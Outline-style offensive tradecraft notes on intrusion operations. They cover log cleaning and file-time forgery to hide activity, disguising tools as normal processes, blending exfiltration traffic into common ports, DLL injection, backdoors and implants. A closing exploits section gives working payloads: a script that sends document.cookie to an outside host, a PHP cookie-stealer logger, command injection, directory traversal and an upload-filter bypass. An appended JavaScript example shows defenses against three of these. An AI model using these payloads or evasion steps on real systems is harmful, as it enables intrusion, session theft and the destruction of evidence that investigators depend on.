Exploitation
The Basics
- Determining potential security posture
  - Are they using an up-to-date OS?
  - What kind of personal security products are installed?
  - Are they using a free antivirus tool, or an enterprise commercial antivirus tool?
  - Is the system patched up to date?
  - Is there a lot of bloatware, or is the box rather spartan, as a corporate build typically should be?
- Tradecraft Rules
  - Rule #1: Do No Harm
    - Never leave a target's equipment less secure than when you found it
    - Do not patch vulnerable software or install defensive tools such as Wireshark or nmap
    - Never knowingly disrupt a target's network or system without express permission from a competent authority
    - This is not your personal computer.
  - Rule #2: No packets directly between source and target
  - Rule #3: Have a clue
    - Always have a plan and a goal
    - Execute your operation quietly
    - Know when to get help
  - Rule #4: Do not scan everything under the sun
    - Noise kills
  - Rule #5: Upload wisely
    - Upload only what you need
    - Use single binaries
    - Do not use public packages
  - Rule #6: Clean your logs
    - Do not remove every log
    - Clean only entries related to your activity
    - Reset the file time to that of the last entry
  - Rule #7: Practice, and don't run untested tools
    - Never practice on a live system
    - Review all code before running it, even in a lab
  - Rule #8: Situational awareness
    - Always be concerned about compromising your tools, techniques, and methods
  - Rule #9: Check yourself before you wreck yourself
    - Check your ego at the door
    - Ask for help if you need it
- Exfiltration Strategies
  - Port targeting
    - Blend in with the environment
    - Redirector selection
    - Ports should make sense (80, 443, 25, etc.)
    - Firewalls, proxies, and other systems may affect traffic on these ports
    - Avoid these ports:
      - 135 and 445 (NetBIOS, SMB)
      - 1433 and other SQL ports
      - 6667 (IRC)
      - 666, 1337, 4444, 6666, 31337, 12345 (associated with known malware and hacking activity)
    - Consider the geographic location of the redirector
  - File manipulation
    - Match the modified time to other files
    - Name your tools to resemble normal processes
  - Cleaning up
    - Remove temporary files, tools, tool-generated logs, etc.
    - Did you schedule a job in Windows? If so, it was probably logged. Delete those logs.
    - Did you substitute user (su) on a UNIX system? If so, it was probably logged. Remove those entries.
    - Did you cause a core dump or a mini-dump? If so, delete those dump files.
    - Are you responsible for any hanging processes? If so, kill those processes.
    - Clean the prefetch directory
- Exploitation through tunnels
  - Additional considerations need to be taken into account, such as latency
  - Not all tools work through a tunnel the same way
  - Don't forget to change "RPORT" to the tunnel redirector!
- Privilege Escalation: rules to remember
  - Never escalate to a critical process unless you know what you are doing
  - Know your privileges (flags)
  - User processes go away when a user logs off
- Shellcode
  - Written in assembly code
  - Techniques
    - Find socket
      - Uses an existing connection between you and the target
    - Reverse shell
    - Port binding
    - Command execution
      - Useful when you do not need a network connection
    - File transfer
    - Multi-stage
    - Syscall proxy
      - Requires few processes and network connections
      - Allows access to core OS functions
      - Executes in a loop, stringing together requests
      - Usually part of a framework-type application
    - Process injection
- Code Injection
  - Overflow Types
    - Buffer
    - Stack
    - Heap
    - Integer
    - Off-by-one error
  - Heap Spraying
    - Not an exploit method
    - A payload delivery technique
  - DLL Injection
    - Windows hooking
      - Calls code when a specific event occurs
      - Commonly used for keylogging
    - AppInit key
      - Runs with user32.dll
    - CreateRemoteThread function
      - Injects a DLL into a running process
    - Reflective DLL Injection
      - Injects a loader into the process
      - Advantages:
        - Not registered or listed in process modules
        - No hooking
        - Fileless
      - Can be found in memory forensics
    - DLL Path Hijacking
      - Search-order hijacking
  - Countermeasures
    - Endpoint security: hook into functions typically used for injection
    - Code signing
- Backdoor Methods
  - Batch files/init scripts
  - Autorun keys
  - AppInit key
  - DLL injection
  - Trojan application
  - Install as a service
  - Load as a driver
- Metasploit
  - Some local commands can be run from the framework console
  - /usr/share/metasploit-framework/
  - Payloads
    - Bind: the shell connects directly to the victim
    - Reverse: the victim calls back to you
    - "DisablePayloadHandler"
      - Prevents Metasploit from automatically attempting to connect to the payload
      - You can then use exploit/multi/handler to "call forward"
- Masquerades
  - Logging into a remote access service with valid credentials that are not yours
- Implants
  - Backdoor
    - Requires the operator to connect to it
    - May require two tunnels, a forward and a reverse: one for the trigger packet and one for the callback
  - Beacon
    - Periodically attempts to initiate a connection to the operator
Some Easy Exploits
Non-secure C (format string)
Takes advantage of a poorly written application that passes user-controlled input straight to printf as the format string, for example printf(password) rather than printf("%s", password).
If the input is %s%s, the two %s are interpreted as format directives instead of being printed as data, so printf reads values from the stack; using this method you could print sensitive values that are normally accessible only to the application.
Input: %s%s
Vulnerable call: printf(password)
Web
Code injection (for input that will be processed directly in a shell)
<normal input> & <command>
IIS 6: circumvent file extension validation
Add ;.jpg (or another valid extension) to the name of the file being uploaded
PHP directory traversal
index.php?page=./../../../file
Cookies
<script>window.location='http://10.1.1.1/?'+document.cookie;</script>
Simple cookie stealer
Host (cookie_stealer.php)
<?php
// Take the cookie value from the query string and append it to a log file
$cookie = $_GET["cookie"];
$log = fopen("log.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
Phish
[url]=<script>window.location='my_url/cookie_stealer.php?cookie='%2bdocument.cookie;</script>
XSS
- Find vulnerable parameters in the page, such as
<url>?search=
- Test whether the input is sanitized
- Exploit!
<script>[command]("[code]");</script>
Ex: http://www.google.com/page.html?default=<script>alert("Hacked!");</script>
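The server-side counterparts of three items in the Web section above (the ?page= directory traversal, the document.cookie stealer, and the reflected ?search= XSS), as an added example that is not part of these notes. The function names (escapeHtml, renderSearchPage, resolvePageParam, sessionCookieHeader) and the /var/www/pages root are this example's own choices.

```javascript
// Added example, not from the notes: defenses for the traversal, cookie-theft
// and reflected-XSS items above, as plain functions that run offline.
// Function names and the page root are constructed for this example.

// 1. Reflected XSS (?search=<script>...): entity-encode before echoing into
//    HTML so the browser renders the payload as text instead of running it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchPage(query) {
  // The query lands in an element body, where entity encoding is sufficient.
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// 2. Directory traversal (?page=./../../../file): resolve the parameter
//    segment by segment against a fixed root and refuse anything that climbs
//    out of it. Returns the resolved path, or null when the request is rejected.
const PAGE_ROOT = ['var', 'www', 'pages'];          // constructed root directory

function resolvePageParam(pageParam) {
  let decoded;
  try { decoded = decodeURIComponent(pageParam); } catch (e) { return null; } // malformed %-escape
  const stack = PAGE_ROOT.slice();
  for (const seg of decoded.split(/[\\/]+/)) {
    if (seg === '' || seg === '.') continue;         // empty or "here": no-op
    if (seg === '..') {
      if (stack.length <= PAGE_ROOT.length) return null; // would escape the root
      stack.pop();
      continue;
    }
    if (!/^[\w.-]+$/.test(seg)) return null;         // reject NULs, '%', etc.
    stack.push(seg);
  }
  return '/' + stack.join('/');
}

// 3. Cookie theft via document.cookie: a session cookie flagged HttpOnly is
//    invisible to script, so the stealer above gets nothing; Secure and
//    SameSite limit where the browser will send it.
function sessionCookieHeader(value) {
  if (!/^[A-Za-z0-9_-]+$/.test(value)) throw new Error('invalid session id');
  return `session=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}
```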